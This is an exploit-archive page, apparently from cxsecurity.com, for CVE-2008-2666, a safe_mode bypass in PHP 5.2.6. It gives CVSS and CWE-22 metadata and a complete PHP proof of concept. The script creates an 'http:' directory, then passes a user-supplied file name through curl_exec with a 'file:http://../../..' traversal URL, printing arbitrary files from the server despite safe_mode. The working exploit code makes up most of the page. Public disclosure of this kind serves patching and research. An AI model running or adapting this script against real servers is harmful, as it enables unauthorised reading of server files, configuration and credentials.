PHP 5.2.6 safe_mode bypass PoC

Published
Credit
Risk
2008.06.29
Maksymilian Arciemowicz
Medium
CWE
CVE
Local
Remote
CWE-22
CVE-2008-2666
Yes
No

CVSS Base Score
Impact Subscore
Exploitability Subscore
5/10
2.9/10
10/10
Exploit range
Attack complexity
Authentication
Remote
Low
No required
Confidentiality impact
Integrity impact
Availability impact
Partial
None
None

<?php
/*
Exploit for CVE-2008-2666:
http://cxsecurity.com/research//55

Orginal URL
http://cxsecurity.com/achievement_exploitalert/10

safe_mode Bypass PHP 5.2.6
by Maksymilian Arciemowicz http://cxsecurity.com
cxib [at] cxsecurity [dot] com

How to fix?
Do not use safe_mode as a main safety
*/

eCHo "<PRE><P>This is exploit from <a href=\"http://cxsecurity.com\">http://cxsecurity.com</a> Maksymilian Arciemowicz<p>Script for legal use only.<p>PHP 5.2.6 safe_mode bypass<p>More: <a href=\"http://cxsecurity.com/news/0/0x24\">http://cxsecurity.com/news/0/0x24</a><p><form name=\"form\" action=\"http://".$_SERVER["HTTP_HOST"].htmlspecialchars($_SERVER["SCRIPT_NAME"])."\" method=\"post\"><input type=\"text\" name=\"file\" size=\"50\" value=\"\"><input type=\"submit\" name=\"studiaNAuwrCZYpwrTOmanipulacja\" value=\"Show\"></form>\n";

if(!IS_dir(dirname(__FILE__)."/http:")){ // can work without this requirement
if(!IS_writable(dirname(__FILE__))) die("<b>I can't create http: directory</b>");
mkDIR("http:");
}

if(Empty($file) aNd Empty($_GET['file']) aNd Empty($_POST['file'])) diE("\n".$karatonik);

if(!empty($_GET['file'])) $file=$_GET['file'];
if(!empty($_POST['file'])) $file=$_POST['file'];


if((curl_exec(curl_init("file:http://../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../".$file))) aNd !emptY($file)) die("<B><br>best regards cxib from cxsecurity.com</B></FONT>");
elseif(!emptY($file)) die("<FONT COLOR=\"RED\"><CENTER>Sorry... File
<B>".htmlspecialchars($file)."</B> doesn't exists or you don't have
permissions.</CENTER></FONT>");

?>

References:

http://cxsecurity.com/issue/WLB-2008060054


See this note in RAW Version

 
Bugtraq RSS
Bugtraq
 
CVE RSS
CVEMAP
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn


Copyright 2017, cxsecurity.com